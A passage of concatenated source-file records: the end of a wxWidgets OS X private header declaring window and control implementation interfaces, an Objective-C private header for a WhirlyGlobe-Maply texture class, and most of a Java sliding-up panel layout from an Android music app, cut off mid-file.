SetSelectedItem(int WXUNUSED(item)) {}\n\n virtual int GetNumberOfItems() const { return -1; }\n\n virtual void InsertItem(int WXUNUSED(pos), const wxString& WXUNUSED(item)) {}\n\n virtual void RemoveItem(int WXUNUSED(pos)) {}\n\n virtual void Clear() {}\n virtual void Popup() {}\n virtual void Dismiss() {}\n\n virtual wxString GetStringAtIndex(int WXUNUSED(pos)) const { return wxEmptyString; }\n\n virtual int FindString(const wxString& WXUNUSED(text)) const { return -1; }\n};\n\n//\n// common interface for buttons\n//\n\nclass wxButtonImpl\n{\n public :\n wxButtonImpl(){}\n virtual ~wxButtonImpl(){}\n\n virtual void SetPressedBitmap( const wxBitmap& bitmap ) = 0;\n} ;\n\n//\n// common interface for search controls\n//\n\nclass wxSearchWidgetImpl\n{\npublic :\n wxSearchWidgetImpl(){}\n virtual ~wxSearchWidgetImpl(){}\n\n // search field options\n virtual void ShowSearchButton( bool show ) = 0;\n virtual bool IsSearchButtonVisible() const = 0;\n\n virtual void ShowCancelButton( bool show ) = 0;\n virtual bool IsCancelButtonVisible() const = 0;\n\n virtual void SetSearchMenu( wxMenu* menu ) = 0;\n\n virtual void SetDescriptiveText(const wxString& text) = 0;\n} ;\n\n//\n// toplevel window implementation class\n//\n\nclass wxNonOwnedWindowImpl : public wxObject\n{\npublic :\n wxNonOwnedWindowImpl( wxNonOwnedWindow* nonownedwnd) : m_wxPeer(nonownedwnd)\n {\n }\n wxNonOwnedWindowImpl()\n {\n }\n virtual ~wxNonOwnedWindowImpl()\n {\n }\n\n virtual void WillBeDestroyed()\n {\n }\n\n virtual void Create( wxWindow* parent, const wxPoint& pos, const wxSize& size,\n long style, long extraStyle, const wxString& name ) = 0;\n\n\n virtual WXWindow GetWXWindow() const = 0;\n\n virtual void Raise()\n {\n }\n\n virtual void Lower()\n {\n }\n\n virtual bool Show(bool WXUNUSED(show))\n {\n return false;\n }\n\n virtual bool ShowWithEffect(bool show, wxShowEffect WXUNUSED(effect), unsigned WXUNUSED(timeout))\n {\n return Show(show);\n }\n\n virtual void Update()\n {\n }\n\n virtual bool SetTransparent(wxByte WXUNUSED(alpha))\n {\n return false;\n }\n\n virtual bool SetBackgroundColour(const wxColour& WXUNUSED(col) )\n {\n return false;\n }\n\n virtual void SetExtraStyle( long WXUNUSED(exStyle) )\n {\n }\n\n virtual void SetWindowStyleFlag( long WXUNUSED(style) )\n {\n }\n\n virtual bool SetBackgroundStyle(wxBackgroundStyle WXUNUSED(style))\n {\n return false ;\n }\n\n virtual bool CanSetTransparent()\n {\n return false;\n }\n\n virtual void GetContentArea( int &left , int &top , int &width , int &height ) const = 0;\n virtual void MoveWindow(int x, int y, int width, int height) = 0;\n virtual void GetPosition( int &x, int &y ) const = 0;\n virtual void GetSize( int &width, int &height ) const = 0;\n\n virtual bool SetShape(const wxRegion& WXUNUSED(region))\n {\n return false;\n }\n\n virtual void SetTitle( const wxString& title, wxFontEncoding encoding ) = 0;\n\n virtual bool EnableCloseButton(bool enable) = 0;\n virtual bool EnableMaximizeButton(bool enable) = 0;\n virtual bool EnableMinimizeButton(bool enable) = 0;\n\n virtual bool IsMaximized() const = 0;\n\n virtual bool IsIconized() const= 0;\n\n virtual void Iconize( bool iconize )= 0;\n\n virtual void Maximize(bool maximize) = 0;\n\n virtual bool IsFullScreen() const= 0;\n\n virtual void ShowWithoutActivating() { Show(true); }\n\n virtual bool EnableFullScreenView(bool enable) = 0;\n\n virtual bool ShowFullScreen(bool show, long style)= 0;\n\n virtual void RequestUserAttention(int flags) = 0;\n\n virtual void ScreenToWindow( int *x, int *y ) = 0;\n\n virtual void WindowToScreen( int *x, int *y ) = 0;\n \n virtual bool IsActive() = 0;\n\n wxNonOwnedWindow* GetWXPeer() { return m_wxPeer; }\n\n static wxNonOwnedWindowImpl*\n FindFromWXWindow(WXWindow window);\n\n static void RemoveAssociations( wxNonOwnedWindowImpl* impl);\n\n static void Associate( WXWindow window, wxNonOwnedWindowImpl *impl );\n\n // static creation methods, must be implemented by all toolkits\n\n static wxNonOwnedWindowImpl* CreateNonOwnedWindow( wxNonOwnedWindow* wxpeer, wxWindow* parent, WXWindow native) ;\n\n static wxNonOwnedWindowImpl* CreateNonOwnedWindow( wxNonOwnedWindow* wxpeer, wxWindow* parent, const wxPoint& pos, const wxSize& size,\n long style, long extraStyle, const wxString& name ) ;\n\n virtual void SetModified(bool WXUNUSED(modified)) { }\n virtual bool IsModified() const { return false; }\n\n virtual void SetRepresentedFilename(const wxString& WXUNUSED(filename)) { }\n\n#if wxOSX_USE_IPHONE\n virtual CGFloat GetWindowLevel() const { return 0.0; }\n#else\n virtual CGWindowLevel GetWindowLevel() const { return kCGNormalWindowLevel; }\n#endif\n virtual void RestoreWindowLevel() {}\nprotected :\n wxNonOwnedWindow* m_wxPeer;\n wxDECLARE_ABSTRACT_CLASS(wxNonOwnedWindowImpl);\n};\n\n#endif // wxUSE_GUI\n\n//---------------------------------------------------------------------------\n// cocoa bridging utilities\n//---------------------------------------------------------------------------\n\nbool wxMacInitCocoa();\n\nclass WXDLLIMPEXP_CORE wxMacAutoreleasePool\n{\npublic :\n wxMacAutoreleasePool();\n ~wxMacAutoreleasePool();\nprivate :\n void* m_pool;\n};\n\n// NSObject\n\nvoid wxMacCocoaRelease( void* obj );\nvoid wxMacCocoaAutorelease( void* obj );\nvoid* wxMacCocoaRetain( void* obj );\n\n\n#endif\n // _WX_PRIVATE_CORE_H_\n"} {"text": "/*\n * MaplyTexture_private.h\n * WhirlyGlobe-MaplyComponent\n *\n * Created by Steve Gifford on 10/25/13.\n * Copyright 2011-2017 mousebird consulting\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\n */\n\n#import \n#import \"MaplyTexture.h\"\n#import \"MaplyRenderController.h\"\n#import \"WhirlyGlobe.h\"\n\n@class MaplyBaseInteractionLayer;\n\n@interface MaplyTexture()\n\n// The view controller the texture is nominally associated with\n@property (nonatomic,weak) MaplyBaseInteractionLayer *interactLayer;\n\n// If this came from a UIImage, the UIImage it came from\n@property (nonatomic,weak) UIImage *image;\n\n// Set if this is a sub texture reference\n@property (nonatomic) bool isSubTex;\n\n// Set if we created the texture\n@property (nonatomic,assign) int width,height;\n\n// If set, the texture ID associated with this texture\n@property (nonatomic) WhirlyKit::SimpleIdentity texID;\n\n// Set while we're waiting for the texture to go away\n@property (nonatomic) bool isBeingRemoved;\n\n// Clear out the texture we're holding\n- (void)clear;\n\n@end\n"} {"text": "package com.naman14.timber.slidinguppanel;\n\nimport android.annotation.SuppressLint;\nimport android.content.Context;\nimport android.content.res.TypedArray;\nimport android.graphics.Canvas;\nimport android.graphics.Paint;\nimport android.graphics.PixelFormat;\nimport android.graphics.Rect;\nimport android.graphics.drawable.Drawable;\nimport android.os.Parcel;\nimport android.os.Parcelable;\nimport android.support.v4.content.ContextCompat;\nimport android.support.v4.view.MotionEventCompat;\nimport android.support.v4.view.ViewCompat;\nimport android.util.AttributeSet;\nimport android.view.Gravity;\nimport android.view.MotionEvent;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.view.accessibility.AccessibilityEvent;\n\nimport com.naman14.timber.R;\n\npublic class SlidingUpPanelLayout extends ViewGroup {\n\n private static final String TAG = SlidingUpPanelLayout.class.getSimpleName();\n\n /**\n * Default peeking out panel height\n */\n private static final int DEFAULT_PANEL_HEIGHT = 68; // dp;\n\n /**\n * Default anchor point height\n */\n private static final float DEFAULT_ANCHOR_POINT = 1.0f; // In relative %\n /**\n * Default height of the shadow above the peeking out panel\n */\n private static final int DEFAULT_SHADOW_HEIGHT = 4; // dp;\n /**\n * If no fade color is given by default it will fade to 80% gray.\n */\n private static final int DEFAULT_FADE_COLOR = 0x99000000;\n /**\n * Whether we should hook up the drag view clickable state\n */\n private static final boolean DEFAULT_DRAG_VIEW_CLICKABLE = true;\n /**\n * Default Minimum velocity that will be detected as a fling\n */\n private static final int DEFAULT_MIN_FLING_VELOCITY = 400; // dips per second\n /**\n * Default is set to false because that is how it was written\n */\n private static final boolean DEFAULT_OVERLAY_FLAG = false;\n /**\n * Default attributes for layout\n */\n private static final int[] DEFAULT_ATTRS = new int[]{\n android.R.attr.gravity\n };\n /**\n * Default paralax length of the main view\n */\n private static final int DEFAULT_PARALAX_OFFSET = 0;\n /**\n * Default slide panel offset when collapsed\n */\n private static final int DEFAULT_SLIDE_PANEL_OFFSET = 0;\n /**\n * Default direct offset flag\n */\n private static final boolean DEFAULT_DIRECT_OFFSET_FLAG = false;\n /**\n * Default initial state for the component\n */\n private static SlideState DEFAULT_SLIDE_STATE = SlideState.COLLAPSED;\n /**\n * The paint used to dim the main layout when sliding\n */\n private final Paint mCoveredFadePaint = new Paint();\n /**\n * Drawable used to draw the shadow between panes.\n */\n private final Drawable mShadowDrawable;\n private final ViewDragHelper mDragHelper;\n private final Rect mTmpRect = new Rect();\n /**\n * Minimum velocity that will be detected as a fling\n */\n private int mMinFlingVelocity = DEFAULT_MIN_FLING_VELOCITY;\n /**\n * The fade color used for the panel covered by the slider. 0 = no fading.\n */\n private int mCoveredFadeColor = DEFAULT_FADE_COLOR;\n /**\n * The size of the overhang in pixels.\n */\n private int mPanelHeight = -1;\n /**\n * Determines how much to slide the panel off when expanded\n */\n private int mSlidePanelOffset = 0;\n /**\n * The size of the shadow in pixels.\n */\n private int mShadowHeight = -1;\n /**\n * Paralax offset\n */\n private int mParallaxOffset = -1;\n /**\n * Clamps the Main view to the slideable view\n */\n private boolean mDirectOffset = false;\n /**\n * True if the collapsed panel should be dragged up.\n */\n private boolean mIsSlidingUp;\n /**\n * Panel overlays the windows instead of putting it underneath it.\n */\n private boolean mOverlayContent = DEFAULT_OVERLAY_FLAG;\n /**\n * If provided, the panel can be dragged by only this view. Otherwise, the entire panel can be\n * used for dragging.\n */\n private View mDragView;\n /**\n * If provided, the panel can be dragged by only this view. Otherwise, the entire panel can be\n * used for dragging.\n */\n private int mDragViewResId = -1;\n /**\n * Whether clicking on the drag view will expand/collapse\n */\n private boolean mDragViewClickable = DEFAULT_DRAG_VIEW_CLICKABLE;\n /**\n * The child view that can slide, if any.\n */\n private View mSlideableView;\n /**\n * The main view\n */\n private View mMainView;\n /**\n * The background view\n */\n private View mBackgroundView;\n private SlideState mSlideState = SlideState.COLLAPSED;\n /**\n * How far the panel is offset from its expanded position.\n * range [0, 1] where 0 = collapsed, 1 = expanded.\n */\n private float mSlideOffset;\n /**\n * How far in pixels the slideable panel may move.\n */\n private int mSlideRange;\n /**\n * A panel view is locked into internal scrolling or another condition that\n * is preventing a drag.\n */\n private boolean mIsUnableToDrag;\n /**\n * Flag indicating that sliding feature is enabled\\disabled\n */\n private boolean mIsSlidingEnabled;\n /**\n * Flag indicating if a drag view can have its own touch events. If set\n * to true, a drag view can scroll horizontally and have its own click listener.\n *

\n * Default is set to false.\n */\n private boolean mIsUsingDragViewTouchEvents;\n private float mInitialMotionX;\n private float mInitialMotionY;\n private float mAnchorPoint = 1.f;\n private PanelSlideListener mPanelSlideListener;\n /**\n * Stores whether or not the pane was expanded the last time it was slideable.\n * If expand/collapse operations are invoked this state is modified. Used by\n * instance state save/restore.\n */\n private boolean mFirstLayout = true;\n\n public SlidingUpPanelLayout(Context context) {\n this(context, null);\n }\n\n public SlidingUpPanelLayout(Context context, AttributeSet attrs) {\n this(context, attrs, 0);\n }\n\n public SlidingUpPanelLayout(Context context, AttributeSet attrs, int defStyle) {\n super(context, attrs, defStyle);\n\n if (isInEditMode()) {\n mShadowDrawable = null;\n mDragHelper = null;\n return;\n }\n\n if (attrs != null) {\n TypedArray defAttrs = context.obtainStyledAttributes(attrs, DEFAULT_ATTRS);\n\n if (defAttrs != null) {\n int gravity = defAttrs.getInt(0, Gravity.NO_GRAVITY);\n if (gravity != Gravity.TOP && gravity != Gravity.BOTTOM) {\n throw new IllegalArgumentException(\"gravity must be set to either top or bottom\");\n }\n mIsSlidingUp = gravity == Gravity.BOTTOM;\n }\n\n defAttrs.recycle();\n\n TypedArray ta = context.obtainStyledAttributes(attrs, R.styleable.SlidingUpPanelLayout);\n\n if (ta != null) {\n mPanelHeight = ta.getDimensionPixelSize(R.styleable.SlidingUpPanelLayout_panelHeight, -1);\n mSlidePanelOffset = ta.getDimensionPixelSize(R.styleable.SlidingUpPanelLayout_slidePanelOffset, DEFAULT_SLIDE_PANEL_OFFSET);\n mShadowHeight = ta.getDimensionPixelSize(R.styleable.SlidingUpPanelLayout_shadowHeight, -1);\n mParallaxOffset = ta.getDimensionPixelSize(R.styleable.SlidingUpPanelLayout_paralaxOffset, -1);\n mDirectOffset = ta.getBoolean(R.styleable.SlidingUpPanelLayout_directOffset, DEFAULT_DIRECT_OFFSET_FLAG);\n\n mMinFlingVelocity = ta.getInt(R.styleable.SlidingUpPanelLayout_flingVelocity, DEFAULT_MIN_FLING_VELOCITY);\n mCoveredFadeColor = ta.getColor(R.styleable.SlidingUpPanelLayout_fadeColor, DEFAULT_FADE_COLOR);\n\n mDragViewResId = ta.getResourceId(R.styleable.SlidingUpPanelLayout_dragView, -1);\n mDragViewClickable = ta.getBoolean(R.styleable.SlidingUpPanelLayout_dragViewClickable, DEFAULT_DRAG_VIEW_CLICKABLE);\n\n mOverlayContent = ta.getBoolean(R.styleable.SlidingUpPanelLayout_overlay, DEFAULT_OVERLAY_FLAG);\n\n mAnchorPoint = ta.getFloat(R.styleable.SlidingUpPanelLayout_anchorPoint, DEFAULT_ANCHOR_POINT);\n\n mSlideState = SlideState.values()[ta.getInt(R.styleable.SlidingUpPanelLayout_initialState, DEFAULT_SLIDE_STATE.ordinal())];\n }\n\n ta.recycle();\n }\n\n final float density = context.getResources().getDisplayMetrics().density;\n if (mPanelHeight == -1) {\n mPanelHeight = (int) (DEFAULT_PANEL_HEIGHT * density + 0.5f);\n }\n if (mShadowHeight == -1) {\n mShadowHeight = (int) (DEFAULT_SHADOW_HEIGHT * density + 0.5f);\n }\n if (mParallaxOffset == -1) {\n mParallaxOffset = (int) (DEFAULT_PARALAX_OFFSET * density);\n }\n // If the shadow height is zero, don't show the shadow\n if (mShadowHeight > 0) {\n if (mIsSlidingUp) {\n mShadowDrawable = ContextCompat.getDrawable(context, R.drawable.above_shadow);\n } else {\n mShadowDrawable = ContextCompat.getDrawable(context, R.drawable.below_shadow);\n }\n\n } else {\n mShadowDrawable = null;\n }\n\n setWillNotDraw(false);\n\n mDragHelper = ViewDragHelper.create(this, 0.5f, new DragHelperCallback());\n mDragHelper.setMinVelocity(mMinFlingVelocity * density);\n\n mIsSlidingEnabled = true;\n }\n\n private static boolean hasOpaqueBackground(View v) {\n final Drawable bg = v.getBackground();\n return bg != null && bg.getOpacity() == PixelFormat.OPAQUE;\n }\n\n /**\n * Set the Drag View after the view is inflated\n */\n @Override\n protected void onFinishInflate() {\n super.onFinishInflate();\n if (mDragViewResId != -1) {\n setDragView(findViewById(mDragViewResId));\n }\n }\n\n /**\n * @return The ARGB-packed color value used to fade the fixed pane\n */\n public int getCoveredFadeColor() {\n return mCoveredFadeColor;\n }\n\n /**\n * Set the color used to fade the pane covered by the sliding pane out when the pane\n * will become fully covered in the expanded state.\n *\n * @param color An ARGB-packed color value\n */\n public void setCoveredFadeColor(int color) {\n mCoveredFadeColor = color;\n invalidate();\n }\n\n public boolean isSlidingEnabled() {\n return mIsSlidingEnabled && mSlideableView != null;\n }\n\n /**\n * Set sliding enabled flag\n *\n * @param enabled flag value\n */\n public void setSlidingEnabled(boolean enabled) {\n mIsSlidingEnabled = enabled;\n }\n\n /**\n * @return The current collapsed panel height\n */\n public int getPanelHeight() {\n return mPanelHeight;\n }\n\n /**\n * Set the collapsed panel height in pixels\n *\n * @param val A height in pixels\n */\n public void setPanelHeight(int val) {\n mPanelHeight = val;\n requestLayout();\n }\n\n /**\n * Sets the panel offset when collapsed so you can exit\n * the boundaries of the top of the screen\n *\n * @param val Offset in pixels\n */\n public void setSlidePanelOffset(int val) {\n mSlidePanelOffset = val;\n requestLayout();\n }\n\n /**\n * @return The current paralax offset\n */\n public int getCurrentParalaxOffset() {\n if (mParallaxOffset < 0) {\n return 0;\n }\n\n return (int) (mParallaxOffset * getDirectionalSlideOffset());\n }\n\n /**\n * @return The directional slide offset\n */\n protected float getDirectionalSlideOffset() {\n return mIsSlidingUp ? -mSlideOffset : mSlideOffset;\n }\n\n /**\n * Sets the panel slide listener\n *\n * @param listener\n */\n public void setPanelSlideListener(PanelSlideListener listener) {\n mPanelSlideListener = listener;\n }\n\n /**\n * Set the draggable view portion. Use to null, to allow the whole panel to be draggable\n *\n * @param dragView A view that will be used to drag the panel.\n */\n public void setDragView(View dragView) {\n if (mDragView != null && mDragViewClickable) {\n mDragView.setOnClickListener(null);\n }\n mDragView = dragView;\n if (mDragView != null) {\n mDragView.setClickable(true);\n mDragView.setFocusable(false);\n mDragView.setFocusableInTouchMode(false);\n if (mDragViewClickable) {\n mDragView.setOnClickListener(new OnClickListener() {\n @Override\n public void onClick(View v) {\n if (!isEnabled()) return;\n if (!isPanelExpanded() && !isPanelAnchored()) {\n expandPanel(mAnchorPoint);\n } else {\n collapsePanel();\n }\n }\n });\n }\n }\n }\n\n /**\n * Gets the currently set anchor point\n *\n * @return the currently set anchor point\n */\n public float getAnchorPoint() {\n return mAnchorPoint;\n }\n\n /**\n * Set an anchor point where the panel can stop during sliding\n *\n * @param anchorPoint A value between 0 and 1, determining the position of the anchor point\n * starting from the top of the layout.\n */\n public void setAnchorPoint(float anchorPoint) {\n if (anchorPoint > 0 && anchorPoint <= 1) {\n mAnchorPoint = anchorPoint;\n }\n }\n\n /**\n * Check if the panel is set as an overlay.\n */\n public boolean isOverlayed() {\n return mOverlayContent;\n }\n\n /**\n * Sets whether or not the panel overlays the content\n *\n * @param overlayed\n */\n public void setOverlayed(boolean overlayed) {\n mOverlayContent = overlayed;\n }\n\n void dispatchOnPanelSlide(View panel) {\n if (mPanelSlideListener != null) {\n mPanelSlideListener.onPanelSlide(panel, mSlideOffset);\n }\n }\n\n void dispatchOnPanelExpanded(View panel) {\n if (mPanelSlideListener != null) {\n mPanelSlideListener.onPanelExpanded(panel);\n }\n sendAccessibilityEvent(AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED);\n }\n\n void dispatchOnPanelCollapsed(View panel) {\n if (mPanelSlideListener != null) {\n mPanelSlideListener.onPanelCollapsed(panel);\n }\n sendAccessibilityEvent(AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED);\n }\n\n void dispatchOnPanelAnchored(View panel) {\n if (mPanelSlideListener != null) {\n mPanelSlideListener.onPanelAnchored(panel);\n }\n sendAccessibilityEvent(AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED);\n }\n\n void dispatchOnPanelHidden(View panel) {\n if (mPanelSlideListener != null) {\n mPanelSlideListener.onPanelHidden(panel);\n }\n sendAccessibilityEvent(AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED);\n }\n\n void updateObscuredViewVisibility() {\n if (getChildCount() == 0) {\n return;\n }\n final int leftBound = getPaddingLeft();\n final int rightBound = getWidth() - getPaddingRight();\n final int topBound = getPaddingTop();\n final int bottomBound = getHeight() - getPaddingBottom();\n final int left;\n final int right;\n final int top;\n final int bottom;\n if (mSlideableView != null && hasOpaqueBackground(mSlideableView)) {\n left = mSlideableView.getLeft();\n right = mSlideableView.getRight();\n top = mSlideableView.getTop();\n bottom = mSlideableView.getBottom();\n } else {\n left = right = top = bottom = 0;\n }\n View child = mMainView;\n final int clampedChildLeft = Math.max(leftBound, child.getLeft());\n final int clampedChildTop = Math.max(topBound, child.getTop());\n final int clampedChildRight = Math.min(rightBound, child.getRight());\n final int clampedChildBottom = Math.min(bottomBound, child.getBottom());\n final int vis;\n if (clampedChildLeft >= left && clampedChildTop >= top &&\n clampedChildRight <= right && clampedChildBottom <= bottom) {\n vis = INVISIBLE;\n } else {\n vis = VISIBLE;\n }\n child.setVisibility(vis);\n }\n\n void setAllChildrenVisible() {\n for (int i = 0, childCount = getChildCount(); i < childCount; i++) {\n final View child = getChildAt(i);\n if (child.getVisibility() == INVISIBLE) {\n child.setVisibility(VISIBLE);\n }\n }\n }\n\n @Override\n protected void onAttachedToWindow() {\n super.onAttachedToWindow();\n mFirstLayout = true;\n }\n\n @Override\n protected void onDetachedFromWindow() {\n super.onDetachedFromWindow();\n mFirstLayout = true;\n }\n\n @Override\n protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {\n final int widthMode = MeasureSpec.getMode(widthMeasureSpec);\n final int widthSize = MeasureSpec.getSize(widthMeasureSpec);\n final int heightMode = MeasureSpec.getMode(heightMeasureSpec);\n final int heightSize = MeasureSpec.getSize(heightMeasureSpec);\n\n if (widthMode != MeasureSpec.EXACTLY) {\n throw new IllegalStateException(\"Width must have an exact value or MATCH_PARENT\");\n } else if (heightMode != MeasureSpec.EXACTLY) {\n throw new IllegalStateException(\"Height must have an exact value or MATCH_PARENT\");\n }\n\n final int childCount = getChildCount();\n\n if (childCount != 2 && childCount != 3) {\n throw new IllegalStateException(\"Sliding up panel layout must have exactly 2 or 3 children!\");\n }\n\n if (childCount == 2) {\n mMainView = getChildAt(0);\n mSlideableView = getChildAt(1);\n } else {\n mBackgroundView = getChildAt(0);\n mMainView = getChildAt(1);\n mSlideableView = getChildAt(2);\n }\n\n if (mDragView == null) {\n setDragView(mSlideableView);\n }\n\n // If the sliding panel is not visible, then put the whole view in the hidden state\n if (mSlideableView.getVisibility() == GONE) {\n mSlideState = SlideState.HIDDEN;\n }\n\n int layoutHeight = heightSize - getPaddingTop() - getPaddingBottom();\n\n // First pass. Measure based on child LayoutParams width/height.\n for (int i = 0; i < childCount; i++) {\n final View child = getChildAt(i);\n final LayoutParams lp = (LayoutParams) child.getLayoutParams();\n\n // We always measure the sliding panel in order to know it's height (needed for show panel)\n if (child.getVisibility() == GONE && child == mMainView) {\n continue;\n }\n\n int height = layoutHeight;\n if (child == mMainView && !mOverlayContent && mSlideState != SlideState.HIDDEN) {\n height -= mPanelHeight;\n }\n\n int childWidthSpec;\n if (lp.width == LayoutParams.WRAP_CONTENT) {\n childWidthSpec = MeasureSpec.makeMeasureSpec(widthSize, MeasureSpec.AT_MOST);\n } else if (lp.width == LayoutParams.MATCH_PARENT) {\n childWidthSpec = MeasureSpec.makeMeasureSpec(widthSize, MeasureSpec.EXACTLY);\n } else {\n childWidthSpec = MeasureSpec.makeMeasureSpec(lp.width, MeasureSpec.EXACTLY);\n }\n\n int childHeightSpec;\n if (lp.height == LayoutParams.WRAP_CONTENT) {\n childHeightSpec = MeasureSpec.makeMeasureSpec(height, MeasureSpec.AT_MOST);\n } else if (lp.height == LayoutParams.MATCH_PARENT) {\n childHeightSpec = MeasureSpec.makeMeasureSpec(height, MeasureSpec.EXACTLY);\n } else {\n childHeightSpec = MeasureSpec.makeMeasureSpec(lp.height, MeasureSpec.EXACTLY);\n }\n\n if (child == mSlideableView) {\n mSlideRange = MeasureSpec.getSize(childHeightSpec) - mPanelHeight + mSlidePanelOffset;\n childHeightSpec += mSlidePanelOffset;\n }\n\n child.measure(childWidthSpec, childHeightSpec);\n }\n\n setMeasuredDimension(widthSize, heightSize);\n }\n\n @Override\n protected void onLayout(boolean changed, int l, int t, int r, int b) {\n final int paddingLeft = getPaddingLeft();\n final int paddingTop = getPaddingTop();\n\n final int childCount = getChildCount();\n\n if (mFirstLayout) {\n switch (mSlideState) {\n case EXPANDED:\n mSlideOffset = 1.0f;\n break;\n case ANCHORED:\n mSlideOffset = mAnchorPoint;\n break;\n case HIDDEN:\n int newTop = computePanelTopPosition(0.0f) + (mIsSlidingUp ? +mPanelHeight : -mPanelHeight);\n mSlideOffset = computeSlideOffset(newTop);\n break;\n default:\n mSlideOffset = 0.f;\n break;\n }\n }\n\n for (int i = 0; i < childCount; i++) {\n final View child = getChildAt(i);\n\n // Always layout the sliding view on the first layout\n if (child.getVisibility() == GONE && (child == mMainView || mFirstLayout)) {\n continue;\n }\n\n final int childHeight = child.getMeasuredHeight();\n int childTop = paddingTop;\n\n if (child == mSlideableView) {\n childTop = computePanelTopPosition(mSlideOffset);\n }\n\n if (!mIsSlidingUp) {\n if (child == mMainView && !mOverlayContent) {\n childTop = computePanelTopPosition(mSlideOffset) + mSlideableView.getMeasuredHeight();\n }\n }\n final int childBottom = childTop + childHeight;\n final int childLeft = paddingLeft;\n final int childRight = childLeft + child.getMeasuredWidth();\n\n child.layout(childLeft, childTop, childRight, childBottom);\n }\n\n if (mFirstLayout) {\n updateObscuredViewVisibility();\n }\n\n mFirstLayout = false;\n }\n\n @Override\n protected void onSizeChanged(int w, int h, int oldw, int oldh) {\n super.onSizeChanged(w, h, oldw, oldh);\n // Recalculate sliding panes and their details\n if (h != oldh) {\n mFirstLayout = true;\n }\n }\n\n /**\n * Set if the drag view can have its own touch events. If set\n * to true, a drag view can scroll horizontally and have its own click listener.\n *

\n * Default is set to false.\n */\n public void setEnableDragViewTouchEvents(boolean enabled) {\n mIsUsingDragViewTouchEvents = enabled;\n }\n\n @Override\n public void setEnabled(boolean enabled) {\n if (!enabled) {\n collapsePanel();\n }\n super.setEnabled(enabled);\n }\n\n @Override\n public boolean onInterceptTouchEvent(MotionEvent ev) {\n final int action = MotionEventCompat.getActionMasked(ev);\n\n\n if (!isEnabled() || !mIsSlidingEnabled || (mIsUnableToDrag && action != MotionEvent.ACTION_DOWN)) {\n mDragHelper.cancel();\n return super.onInterceptTouchEvent(ev);\n }\n\n if (action == MotionEvent.ACTION_CANCEL || action == MotionEvent.ACTION_UP) {\n mDragHelper.cancel();\n return false;\n }\n\n final float x = ev.getX();\n final float y = ev.getY();\n\n switch (action) {\n case MotionEvent.ACTION_DOWN: {\n mIsUnableToDrag = false;\n mInitialMotionX = x;\n mInitialMotionY = y;\n break;\n }\n\n case MotionEvent.ACTION_MOVE: {\n final float adx = Math.abs(x - mInitialMotionX);\n final float ady = Math.abs(y - mInitialMotionY);\n final int dragSlop = mDragHelper.getTouchSlop();\n\n // Handle any horizontal scrolling on the drag view.\n if (mIsUsingDragViewTouchEvents && adx > dragSlop && ady < dragSlop) {\n return super.onInterceptTouchEvent(ev);\n }\n\n if ((ady > dragSlop && adx > ady) || !isDragViewUnder((int) mInitialMotionX, (int) mInitialMotionY)) {\n mDragHelper.cancel();\n mIsUnableToDrag = true;\n return false;\n }\n break;\n }\n }\n\n return mDragHelper.shouldInterceptTouchEvent(ev);\n }\n\n @Override\n public boolean onTouchEvent(MotionEvent ev) {\n if (!isSlidingEnabled()) {\n return super.onTouchEvent(ev);\n }\n mDragHelper.processTouchEvent(ev);\n return true;\n }\n\n private boolean isDragViewUnder(int x, int y) {\n if (mDragView == null) return false;\n int[] viewLocation = new int[2];\n mDragView.getLocationOnScreen(viewLocation);\n int[] parentLocation = new int[2];\n this.getLocationOnScreen(parentLocation);\n int screenX = parentLocation[0] + x;\n int screenY = parentLocation[1] + y;\n return screenX >= viewLocation[0] && screenX < viewLocation[0] + mDragView.getWidth() &&\n screenY >= viewLocation[1] && screenY < viewLocation[1] + mDragView.getHeight();\n }\n\n private boolean expandPanel(View pane, int initialVelocity, float mSlideOffset) {\n return mFirstLayout || smoothSlideTo(mSlideOffset, initialVelocity);\n }\n\n private boolean collapsePanel(View pane, int initialVelocity) {\n return mFirstLayout || smoothSlideTo(0.0f, initialVelocity);\n }\n\n /*\n * Computes the top position of the panel based on the slide offset.\n */\n private int computePanelTopPosition(float slideOffset) {\n int slidingViewHeight = mSlideableView != null ? mSlideableView.getMeasuredHeight() : 0;\n int slidePixelOffset = (int) (slideOffset * mSlideRange);\n // Compute the top of the panel if its collapsed\n return mIsSlidingUp\n ? getMeasuredHeight() - getPaddingBottom() - mPanelHeight - slidePixelOffset\n : getPaddingTop() - slidingViewHeight + mPanelHeight + slidePixelOffset;\n }\n\n /*\n * Computes the slide offset based on the top position of the panel\n */\n private float computeSlideOffset(int topPosition) {\n // Compute the panel top position if the panel is collapsed (offset 0)\n final int topBoundCollapsed = computePanelTopPosition(0);\n\n // Determine the new slide offset based on the collapsed top position and the new required\n // top position\n return (mIsSlidingUp\n ? (float) (topBoundCollapsed - topPosition) / mSlideRange\n : (float) (topPosition - topBoundCollapsed) / mSlideRange);\n }\n\n /**\n * Collapse the sliding pane if it is currently slideable. If first layout\n * has already completed this will animate.\n *\n * @return true if the pane was slideable and is now collapsed/in the process of collapsing\n */\n public boolean collapsePanel() {\n if (mFirstLayout) {\n mSlideState = SlideState.COLLAPSED;\n return true;\n } else {\n if (mSlideState == SlideState.HIDDEN || mSlideState == SlideState.COLLAPSED)\n return false;\n return collapsePanel(mSlideableView, 0);\n }\n }\n\n /**\n * Expand the sliding pane if it is currently slideable.\n *\n * @return true if the pane was slideable and is now expanded/in the process of expading\n */\n public boolean expandPanel() {\n if (mFirstLayout) {\n mSlideState = SlideState.EXPANDED;\n return true;\n } else {\n return expandPanel(1.0f);\n }\n }\n\n /**\n * Expand the sliding pane to the anchor point if it is currently slideable.\n *\n * @return true if the pane was slideable and is now expanded/in the process of expading\n */\n public boolean anchorPanel() {\n if (mFirstLayout) {\n mSlideState = SlideState.ANCHORED;\n return true;\n } else {\n return expandPanel(mAnchorPoint);\n }\n }\n\n /**\n * Partially expand the sliding panel up to a specific offset\n *\n * @param mSlideOffset Value between 0 and 1, where 0 is completely expanded.\n * @return true if the pane was slideable and is now expanded/in the process of expanding\n */\n 